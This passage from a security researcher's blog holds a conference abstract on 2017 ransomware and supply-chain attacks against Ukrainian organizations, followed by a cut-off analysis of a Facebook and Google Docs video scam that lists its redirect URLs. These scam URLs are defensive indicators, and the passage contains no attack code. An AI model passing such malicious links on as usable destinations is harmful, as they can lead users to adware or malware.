<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR6UhAoJrN9hFT00EE8Uk-bSwupzYet2fbxr7_sVs-pp4Ty9IdPGFkFjEF_0cywVN0jI3yQhAxdKqhoOann5L7rQ0s-lBdJI9PnsdRI5jrgMpY9BQVZdeOoahgqKXnw-6ycbY5KHHSZrPH/s1600/vb2017_BattlefieldUkraine.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="842" data-original-width="1113" height="484" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR6UhAoJrN9hFT00EE8Uk-bSwupzYet2fbxr7_sVs-pp4Ty9IdPGFkFjEF_0cywVN0jI3yQhAxdKqhoOann5L7rQ0s-lBdJI9PnsdRI5jrgMpY9BQVZdeOoahgqKXnw-6ycbY5KHHSZrPH/s640/vb2017_BattlefieldUkraine.jpg" width="640" /></a></div>
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This summer, we observed a supply-chain attack through M.E.Doc, accounting software popular in Ukraine, which culminated in the outbreak of the NotPetya ransomware-wiper [<a href="https://nioguard.blogspot.com/2017/06/eternalpetya-ransomware-analysis.html">4</a>]. During the M.E.Doc campaign, we discovered attacks carried out with several specially crafted ransomware families: XData (an AES-NI clone) [<a href="https://nioguard.blogspot.com/2017/06/xdata-ransomware-attacked-users-in.html">5</a>], WannaCry.NET (a WannaCry clone) [<a href="https://nioguard.blogspot.com/2017/06/one-more-attack-to-ukraine-via-medoc.html">6</a>], and NotPetya (a Petya&Misha&WannaCry clone). It is worth mentioning that the first notable infection through the trojanized M.E.Doc [<a href="https://nioguard.blogspot.com/2017/07/comparing-medoc-backdoors-in-176-186.html">7</a>], with XData ransomware, happened in the middle of May, more than a month before NotPetya was launched.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Now we are seeing another ongoing campaign against Ukrainian organizations that follows a similar scenario. First, the attackers compromised the web server of the Ukrainian producer of another accounting software product [<a href="https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html">8</a>] and used it to host the Chthonic (Zeus-based) backdoor, seen in June in a nation-state attack against a Ukrainian government institution [<a href="https://nioguard.blogspot.com/2017/06/chthonic-trojan-is-back-in-nation-state.html">9</a>], and PSCrypt-2, a clone of the GlobeImposter (Globe-based) ransomware [<a href="https://www.bleepingcomputer.com/news/security/before-notpetya-there-was-another-ransomware-that-targeted-ukraine-last-week/">10</a>]. Then they spear-phished the targets to make them download and install one of these payloads.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">We continue working with the victims to find out more information about the attack vectors.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In the talk, we’ll show the timeline and highlight the patterns behind these attacks in:</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The attack vectors</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The types of malware used, in the context of previous nation-state attacks</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Ransomware design style</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">C&C domains</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Peculiarities of language use</span></div>
</li>
</ul>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Finally, we’ll conclude with our hypotheses about who is behind the summer attacks in Ukraine.</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span> <span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">UPD:</span> <span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The </span><span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">slides from </span><span style="font-family: "arial"; font-size: 14.6667px; white-space: pre-wrap;">VB2017 </span><span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">are available at: </span><span style="color: #2200cc; font-family: "arial"; font-size: 10pt; vertical-align: baseline; white-space: pre-wrap;"><a href="https://goo.gl/fKR9hK" style="text-decoration-line: none;">https://goo.gl/fKR9hK</a></span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[1] </span><a href="https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[2] </span><a href="https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[3] </span><a href="https://dragos.com/blog/crashoverride/CrashOverride-01.pdf" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://dragos.com/blog/crashoverride/CrashOverride-01.pdf</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[4] </span><a href="https://nioguard.blogspot.com/2017/06/eternalpetya-ransomware-analysis.html" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://nioguard.blogspot.com/2017/06/eternalpetya-ransomware-analysis.html</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[5] </span><a href="https://nioguard.blogspot.com/2017/06/xdata-ransomware-attacked-users-in.html" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://nioguard.blogspot.com/2017/06/xdata-ransomware-attacked-users-in.html</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[6] </span><a href="https://nioguard.blogspot.com/2017/06/one-more-attack-to-ukraine-via-medoc.html" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://nioguard.blogspot.com/2017/06/one-more-attack-to-ukraine-via-medoc.html</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[7] </span><a href="https://nioguard.blogspot.com/2017/07/comparing-medoc-backdoors-in-176-186.html" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://nioguard.blogspot.com/2017/07/comparing-medoc-backdoors-in-176-186.html</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[8] </span><a href="https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[9] </span><a href="https://nioguard.blogspot.com/2017/06/chthonic-trojan-is-back-in-nation-state.html" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://nioguard.blogspot.com/2017/06/chthonic-trojan-is-back-in-nation-state.html</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[10] </span><a href="https://www.bleepingcomputer.com/news/security/before-notpetya-there-was-another-ransomware-that-targeted-ukraine-last-week/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://www.bleepingcomputer.com/news/security/before-notpetya-there-was-another-ransomware-that-targeted-ukraine-last-week/</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<div>
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
</div>
Alexander Adamov (<a href="http://www.blogger.com/profile/10336415028200154730">Blogger profile</a>)<br />
<b>Facebook video scam continues spreading undetected</b> (published 2017-09-14, updated 2017-10-30)<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKU2YbimEv2UUOKxwa3HReu7HLlYNfR_R2raoBuEm6zEcnaJ6_4jXCIRwL20_hgb0PFX3h9lyt202sQ4Y_UaQFDui68DbZq61VAXvskLGe74dTszWamRwEWO37Itb6yBdKXQJXZFP1lOXX/s1600/head.png" imageanchor="1"><img border="0" height="456" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKU2YbimEv2UUOKxwa3HReu7HLlYNfR_R2raoBuEm6zEcnaJ6_4jXCIRwL20_hgb0PFX3h9lyt202sQ4Y_UaQFDui68DbZq61VAXvskLGe74dTszWamRwEWO37Itb6yBdKXQJXZFP1lOXX/s640/head.png" width="640" /></a></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Facebook and Google Docs continue to be used by scammers as a delivery channel for malware and adware.</span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In October 2016, Facebook users were sent links to supposedly adult videos </span><a href="https://securelist.com/adult-video-for-facebook-users/76387/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">[1]</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> that could be played from a fake YouTube portal only after the target downloaded and installed a malicious “Video Plugin”.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In August 2017, the same attack vector was used to spread adware </span><span style="color: #1155cc; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><a href="https://securelist.com/new-multi-platform-malwareadware-spreading-via-facebook-messenger/81590/" style="text-decoration-line: none;">[2]</a></span><span style="font-weight: normal;">.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span> <span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">And today, I saw the following message on my Facebook, which arrived from the hacked mobile Facebook app of one of my former students. In addition to the message, I and the victim’s other friends were marked in a comment on the post with a fake video.</span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="418" src="https://lh4.googleusercontent.com/ADvJuKepAaw3sK5Ugy33wsSAQFT00sDbPLzuRXBsAIHCKPomqDFq4OS1pt_1r0j3R__Vs4ZW23DJzUihqol-07z0wQOP_7zvaWLTRoBCnjTf-k9ivmQCGxFMcIRCieIT-5SqQwer" style="border: none; transform: rotate(0rad);" width="327" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Let’s figure out how this scam works.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">As you can see, the link points to a Google Document:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">https://docs.google.com/file/d/0B{CENSORED}UU/preview</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span> <span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The URL is detected as clean:</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOp9bVANGA_ut_p8Pb6tCLJfjgmIRvQJHKKbZStl-026a-bwC_e30yyztL2LgpL4sbasi_d-XvdqX3f6CW6k7RVyley5aUj2J7Dfc39xa0Ak21-xGBdY3PkCrxBUefs22LarNkN7yC-bQ_/s1600/vt_url.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="266" data-original-width="1077" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOp9bVANGA_ut_p8Pb6tCLJfjgmIRvQJHKKbZStl-026a-bwC_e30yyztL2LgpL4sbasi_d-XvdqX3f6CW6k7RVyley5aUj2J7Dfc39xa0Ak21-xGBdY3PkCrxBUefs22LarNkN7yC-bQ_/s640/vt_url.png" width="640" /></a></div>
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Following the link (Facebook does not block it), you can see its preview.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCuYsfrLpviQ1SeG41hGzeIdzZ8HxYE5YBQ0A3j9uqKEDlBluHIJHiDohTNESVPzyKaX7npd6Dekp2PpYfEt7uTIMfAoMxLDYJ2RMIM8O6Vxczs8qDl3NOcVEppo24DHgcE-Nltowhwboh/s1600/2_1.png" imageanchor="1"><img border="0" height="456" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCuYsfrLpviQ1SeG41hGzeIdzZ8HxYE5YBQ0A3j9uqKEDlBluHIJHiDohTNESVPzyKaX7npd6Dekp2PpYfEt7uTIMfAoMxLDYJ2RMIM8O6Vxczs8qDl3NOcVEppo24DHgcE-Nltowhwboh/s640/2_1.png" width="640" /></a></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The document is named “Video - &lt;Name of the victim on Facebook&gt;”.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">When downloading, you can see that the file type is PDF.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="282" src="https://lh3.googleusercontent.com/x_P-Bn4sqpZAt5k6s5sU0Sn18WLPHK9eeys-EpY4sbe6NgZO_rI5D2OOfPj56GWDVoVWKIgtaIwcMrqmU1CvHiMXAz7mGVXPeRYa6m5CCSHzH7frWjlym1wQkZSE0pgS7cy6Jvrx" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="402" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If you click the fake YouTube-style ‘Play’ button in the center of the image, you are first redirected to:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<a href="http://fastredirects.com/ad/33dc2458" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://fastredirects.com/ad/33dc2458</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Then to:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><a href="http://r.leadzuaf.com/?m=0BDLADULT01&a=373.790138c0ef79e169f861fbbbde4c05d8&pubid=373" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://r.leadzuaf.com/?m=0BDLADULT01&a=373.790138c0ef79e169f861fbbbde4c05d8&pubid=373</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">And finally to:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<a href="http://d.billyaffcontent.com/offerNotAvailable" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://d.billyaffcontent.com/offerNotAvailable</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
